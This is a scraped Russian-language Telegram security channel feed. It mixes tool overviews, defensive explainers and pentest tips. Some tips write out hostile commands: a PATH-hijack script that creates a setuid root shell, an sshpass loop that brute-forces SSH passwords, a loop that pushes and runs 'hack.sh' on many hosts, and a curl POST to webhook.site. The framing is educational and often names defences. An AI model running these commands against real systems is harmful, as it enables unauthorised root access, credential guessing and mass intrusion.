MyIP: универсальный чекер IP и сетевых связей
👋
⏺ MyIP - универсальный «чекер» всего, что связано с твоим IP: геолокация, DNS- и WebRTC-утечки, доступность сайтов, speed test, MTR и whois. Короче все в одном месте, без беготни по десятку сервисов.
⏺ Можно быстро проверить пинг до серверов по миру, доступность популярных сайтов и получить полную инфу по любому IPшнику.
⏺ Смотрим локально:
Или одной командой через Docker:
⏺ И финально, что еще есть классного: PWA, мобильный режим, тёмная тема, хоткеи и встроенный чек-лист по кибербезу даже 😎
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.git clone https://github.com/jason5ng32/MyIP.git
cd MyIP
npm install && npm run build
npm start
Или одной командой через Docker:
docker run -d -p 18966:18966 --name myip jason5ng32/myip:latest
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12🤡5👍3❤🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
DLP vs CASB: что выбрать?
👋
⏺ DLP (Data Loss Prevention) - это как внутренний «охранник» компании. Следит, чтобы важные данные не улетели наружу: почта, флешки, копирование файлов. Помогает предотвратить случайные утечки или намеренные кражи инфы внутри компании. Главное, что DLP отлично работает внутри корпоративной сети, но с облачными сервисами и SaaS ограничений больше.
⏺ CASB (Cloud Access Security Broker) — такой «страж» облака. Контролирует доступ к SaaS, проверяет трафик, шифрует данные, ловит подозрительные действия и блокирует непонятные подключения. Он ориентирован на облачные сервисы, поэтому локальные файлы и устройства под его зоной действия не всегда.
ZeroDay | #CASB #DLP
Приветствую в мире цифровой безопасности!Разберем, что выбрать для защиты от утечек данных — DLP или CASB.ZeroDay | #CASB #DLP
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7❤🔥3👌2👍1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга
👋
⏺ Linux capabilities вместо SUID: SUID-бинарники - это старый трюк, но современные админы иногда забывают про capabilities.
➡️ Видите cap_net_admin или cap_setuid+ep? Вот теперь можно изучить бинарь и поднять права. Защита проста: убрать лишние capabilities и мониторить их появление.
⏺ PATH-hijack через cron или systemd: Если сервис запускает команды без полного пути — подкиньте свой бинар в каталог, который стоит раньше в PATH:
➡️ Защита: жёсткий PATH и абсолютные пути в unit-файлах и crontab, запрет на запись в системные каталоги.
⏺ SSH-agent forwarding & ProxyCommand для тихого pivot: Агент на цели может быть вашим тайным оружием: ключи остаются у вас, а доступ дальше можно получить через ProxyCommand/ProxyJump.
➡️ Защита: отключать агент-форвардинг (AllowAgentForwarding no) и следить за нестандартным SSH-трафиком.
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках при пентесте.getcap -r / 2>/dev/null
echo -e '#!/bin/bash\ncp /bin/sh /tmp/rootsh && chmod +s /tmp/rootsh' > /tmp/backup
chmod +x /tmp/backup
export PATH=/tmp:$PATH
ssh-add -L # покажет ключи агента
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤5❤🔥1
ZeroDay | #атака
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤5
Криптопаразиты-снайперы: грабь награбленное‽
Биткоин-головоломки с «легкими» BTC казались простым выигрышем, пока не появились криптопаразиты, то есть хакеры, которые перебивают транзакции и забирают приз себе. Механика тут проста: транзакция раскрывает публичный ключ, а слабые кошельки позволяют быстро вычислить приватный и отправить свою транзакцию с более высокой комиссией.
⏺ В статье у нас краткий разбор: как перебивают транзакции, ускоряют ставки, используют PoC и тестовые скрипты, чтобы забрать награбленное. Кейсы на 6.6–6.9 BTC показывают, как паразиты действуют быстрее обычного юзера и почему нужно быть осторожным с «легкими» головоломками.
ZeroDay | #Статья
Биткоин-головоломки с «легкими» BTC казались простым выигрышем, пока не появились криптопаразиты, то есть хакеры, которые перебивают транзакции и забирают приз себе. Механика тут проста: транзакция раскрывает публичный ключ, а слабые кошельки позволяют быстро вычислить приватный и отправить свою транзакцию с более высокой комиссией.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍1
Что обычно используется для «pivoting» при внутреннем тестировании в разрешённой среде?
Anonymous Quiz
16%
Открытые SMB-шеры
48%
SSH/Socks прокси через скомпрометированный хост
18%
Подмена ARP на границе сети
18%
Смена VLAN без доступа к коммутатору
🔥12👍3❤1
afrog: сканер, который ускоряет пентест
👋
⏺ Что это: afrog - быстрый и стабильный сканер на Go. Пробегает встроенные PoC: CVE, CNVD, default-пароли, info-leak, RCE, arbitrary file read и многое другое. Можно добавлять свои PoC, а результаты сразу превращаются в аккуратный HTML-отчёт.
⏺ В чем удобство: мало ложных срабатываний, легко масштабируется на десятки сайтов, поддерживает фильтры по ключевым словам и уровню критичности, плюс JSON для CI/CD.
⏺ Глянем на практике:
Скан одного сайта:
Скан по списку:
⏺ Полезные флаги:
• -P <mypocs/> — свои PoC
• -s keyword1,keyword2 — поиск по ключевым словам
• -S high,critical — фильтр по серьёзности
• -json / -json-all — сохранить результаты в JSON
• -web — локальный веб-интерфейс для просмотра отчётов
⏺ Для сложных PoC: некоторые проверки требуют OOB (ceye, dnslog и др.). Первый запуск создаёт ~/.config/afrog/afrog-config.yaml — настройте секцию reverse и API ключи, чтобы все blind-RCE работали корректно.
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.git clone https://github.com/zan8in/afrog.git
cd afrog
go build cmd/afrog/main.go
./afrog -h
Скан одного сайта:
./afrog -t https://example.com
Скан по списку:
./afrog -T urls.txt
• -P <mypocs/> — свои PoC
• -s keyword1,keyword2 — поиск по ключевым словам
• -S high,critical — фильтр по серьёзности
• -json / -json-all — сохранить результаты в JSON
• -web — локальный веб-интерфейс для просмотра отчётов
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18🤨3👍1💘1
IP Spoofing: защита на сетевом уровне (Layer 3)
👋
⏺ Смысл атаки: хакер подменяет IP-адрес источника в пакетах, чтобы скрыть своё местоположение, обойти фильтры или направить трафик на жертву. Это классика для DDoS, MITM и обхода контроля доступа.
⏺ Покажу на практике:
1️⃣ Ingress/Egress Filtering: фильтруем пакеты на границах сети, чтобы трафик с «чужим» исходным IP просто не проходил.
Cisco:
Linux (iptables):
2️⃣ Reverse Path Filtering (uRPF): проверяем, что пакет пришёл по корректному маршруту. Если нет - DROP.
Linux:
3️⃣ Точечный мониторинг и alert-правила: следим за подозрительными исходящими пакетами. Даже если атака идёт изнутри сети, IDS сможет поднять тревогу. Например, Suricata правило:
ZeroDay | #Zeroday
Приветствую в мире цифровой безопасности!
В одном из прошлых постов разбирали типы спуфинг атак по уровням. Сейчас посмотрим, как защититься от одной из них.Cisco:
interface GigabitEthernet0/1
ip verify unicast source reachable-via rx
Linux (iptables):
iptables -A INPUT -s 192.168.0.0/16 -j ACCEPT
iptables -A INPUT -s 0.0.0.0/0 -j DROP
Linux:
echo 1 > /proc/sys/net/ipv4/conf/all/rp_filter
alert ip any any -> 192.168.0.0/16 any (msg:"Suspicious spoofed packet"; sid:100001;)
ZeroDay | #Zeroday
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤4
Какой метод атаки позволяет обойти DEP и ASLR, используя цепочки существующих инструкций в памяти?
Anonymous Quiz
26%
Heap Spraying
51%
Return-Oriented Programming (ROP)
15%
SQL Injection
9%
XSS
😢3
This media is not supported in your browser
VIEW IN TELEGRAM
5 фишек Bash для автоматизации атак
👋
⏺ Массовый пинг сети: Бывает, нет под рукой nmap, а нужно быстро понять, какие машины живы в подсети. Поможет простой цикл:
Одной строкой получаем список активных хостов.
⏺ Проверка открытых портов без nmap: То же самое можно сделать и с портами:
⏺ Автоподбор паролей через SSH: Мини-брут без Hydra - иногда работает на тестовых стендах:
⏺ Заливка скрипта на все машины: Рутинные действия можно автоматизировать одним циклом:
Так можно массово прогнать свой скрипт по списку хостов.
⏺ Сбор инфы с машин: Чтобы не заходить на каждый сервер отдельно:
ZeroDay | #bash
Приветствую в мире цифровой безопасности!
Давай расскажу о 5 фишках Bash, которые заметно ускорят пентест.for ip in 192.168.1.{1..254}; do ping -c1 -W1 $ip &>/dev/null && echo "$ip жив"; doneОдной строкой получаем список активных хостов.
for p in 22 80 443 3306; do (echo >/dev/tcp/192.168.1.10/$p) &>/dev/null && echo "порт $p открыт"; done
while read p; do sshpass -p "$p" ssh -o StrictHostKeyChecking=no user@host "echo успех с $p" && break; done < passlist.txt
for h in $(cat hosts.txt); do scp hack.sh $h:/tmp/; ssh $h "bash /tmp/hack.sh"; done
Так можно массово прогнать свой скрипт по списку хостов.
for h in $(cat hosts.txt); do echo "== $h =="; ssh $h "id; uname -a; df -h"; done
ZeroDay | #bash
Please open Telegram to view this post
VIEW IN TELEGRAM
❤18👍6🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
EDR vs NDR: что выбрать и как их совместить?
👋
⏺ EDR (Endpoint Detection and Response) - можно сказать, что это, как охранник на каждом компьютере или сервере. Он фиксирует непонятные процессы, аномалии в поведении приложений и сразу реагирует. Можно юзать против локальных атак и вредоносов.
⏺ NDR (Network Detection and Response) - тут уже что-то вроде шпиона внутри сети. Он анализирует трафик, ищет аномальные соединения, подозрительные паттерны протоколов и нестандартное поведение, даже если конечные точки чистые.
⏺ Но лучше их комбинировать: EDR быстро блочит локальные угрозы, NDR ловит скрытые сетевые атаки и нетривиальные попытки обхода. Вместе они дают полный обзор и ускоряют расследование инцидентов.
ZeroDay | #EDR #NDR
Приветствую в мире цифровой безопасности!Расскажу, чем отличаются EDR и NDR. И можно ли их юзать совместно.ZeroDay | #EDR #NDR
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍3🌭1
Isolation Forest: как находить аномалии в данных
Аномалии - это не всегда очевидные выбросы: глобальные (резко отличающиеся точки), контекстные (необычные сочетания признаков) и коллективные (группы «нормальных» точек с аномальным паттерном). Isolation Forest ловит такие выбросы, создавая ансамбль деревьев и «изолируя» редкие наблюдения; каждая случайная выборка учится выявлять аномалии, а объединение моделей повышает точность.
⏺ В статье будет очень наглядное объяснение типов аномалий и как ансамбли деревьев Isolation Forest помогают их обнаружить, с примерами глобальных, контекстных и коллективных выбросов.
ZeroDay | #Статья
Аномалии - это не всегда очевидные выбросы: глобальные (резко отличающиеся точки), контекстные (необычные сочетания признаков) и коллективные (группы «нормальных» точек с аномальным паттерном). Isolation Forest ловит такие выбросы, создавая ансамбль деревьев и «изолируя» редкие наблюдения; каждая случайная выборка учится выявлять аномалии, а объединение моделей повышает точность.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤7👨💻3
dirsearch: сканер скрытых путей
👋
⏺ dirsearch - такой быстрый web path scanner, который помогает находить спрятанные директории и файлы на сайтах.
⏺ dirsearch брутфорсит пути по словарю и проверяет их доступность. Так можно найти забытые админки, бэкапы или тестовые файлы.
⏺ Что умеет: поддержка wordlist’ов, маскировка расширений (-e php,html,js), рекурсивное сканирование (-r), фильтрация по статусам и даже обход лимитов через прокси или Tor.
⏺ Как работает:
⏺ Результат, кстати, можно выгрузить в json, html или csv.
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.# стандартный запуск
python3 dirsearch.py -u https://target -e php,html,js -w /path/to/wordlist -r -t 30
# скан с сохранением в отчёт (HTML)
python3 dirsearch.py -u https://target -w /path/to/wordlist --format=html -o report.html
# запуск через прокси
python3 dirsearch.py -u https://target -w /path/to/wordlist --proxy=http://127.0.0.1:8080
# ограничение по коду ответа (например, только 200)
python3 dirsearch.py -u https://target -w /path/to/wordlist --include-status=200
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚7❤5
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга
👋
⏺ Скрытый канареечный файл с webhook‑оповещением: Ставит «приманку», которая подтверждает факт доступа и фиксирует время/источник, полезно для верификации пост‑эксплойта.
⏺ Целевая разведка с fingerprinting и enum: Короткие, прицельные запросы дають больше точной инфы и меньше шума в логах. Но сначала узнайте версии и медиа‑векторы.
➡️ Тут защититься так: мониторить аномальные sequence‑patterns сканирования и блокировать нестандартные заголовки/поведение.
⏺ SSH‑pivot через нестандартный порт + agent‑forwarding: Используйте агент для безопасного доступа без копирования ключей, а нестандартный порт и jump‑host уменьшают «шум» в простых фильтрах. Всегда проверяйте, какие ключи в агенте, прежде чем прыгать.
➡️ Защититься можно так: надо выключить AgentForwarding, зафиксировать и аудитить jump‑hosts, жесткие ACL и логирование нестандартных портов.
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках при пентесте.echo "TOP_SECRET" > /tmp/credentials.xlsx
curl -s -X POST https://webhook.site/your-id -d "event=access&file=/tmp/credentials.xlsx&time=$(date -Iseconds)"
nmap -sS -sV -p22,80,443 --noscript=banner target.example.com
curl -I http://target.example.com | grep -i "Server\|X-Powered-By"
ssh-add -l
ssh -p 2222 -A -J user@bastion user@target
# или ProxyCommand
ssh -o ProxyCommand="ssh -W %h:%p -p2222 user@bastion" user@target
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤5🤩1
Как появилась программа багбаунти? История развития
👋
⏺ Первые шаги: идея платить за взлом появилась ещё в XIX веке. Компания Bramah Locks предложила вознаграждение тому, кто вскроет «невзламываемый» замок. Спустя 70 лет это удалось слесарю Альфреду Хоббсу - и это стало прообразом будущих баунти.
⏺ Эра компьютеров: в 1983 году Hunter & Ready выдали 1000 $ или Volkswagen «жук» за баг в своей ОС. В 1995 Netscape запустила первую известную прогу для браузера Navigator, где исследователям платили за найденные уязвимости.
⏺ Сопротивление и скепсис: многие компании долго не решались на открытые программы. Боялись ударов по репутации, скрывали баги и не доверяли сторонним хакерам. Но со временем стало очевидно: дешевле и безопаснее поощрять исследователей, чем ждать инцидентов.
⏺ Систематизация: в 2000-х появились Zero Day Initiative, а позже HackerOne и Bugcrowd. Эти площадки взяли на себя инфраструктуру: проверку отчётов, выплаты и правила для исследователей. Участие стало массовым и удобным для компаний.
⏺ И как сейчас: Google, Microsoft, Яндекс, VK и сотни других компаний платят за баги. За критические уязвимости дают десятки тысяч долларов, а рекорд на российских платформах - почти 5 млн ₽ за один баг.
ZeroDay | #история
Приветствую в мире цифровой безопасности!Сегодня разберём, откуда взялись программы багбаунти и как они стали частью кибербезопасности.ZeroDay | #история
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👨💻3
This media is not supported in your browser
VIEW IN TELEGRAM
Приветствую в мире цифровой безопасности!
Сделал для вас новую подборку крутых подкастов по ИБ и не только.
— обсуждения новостей из мира ИБ. Особенность подкаста в том, что он сосредоточен на повседневных последствиях кибербезопасности.
ZeroDay | #Подборка
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍3❤2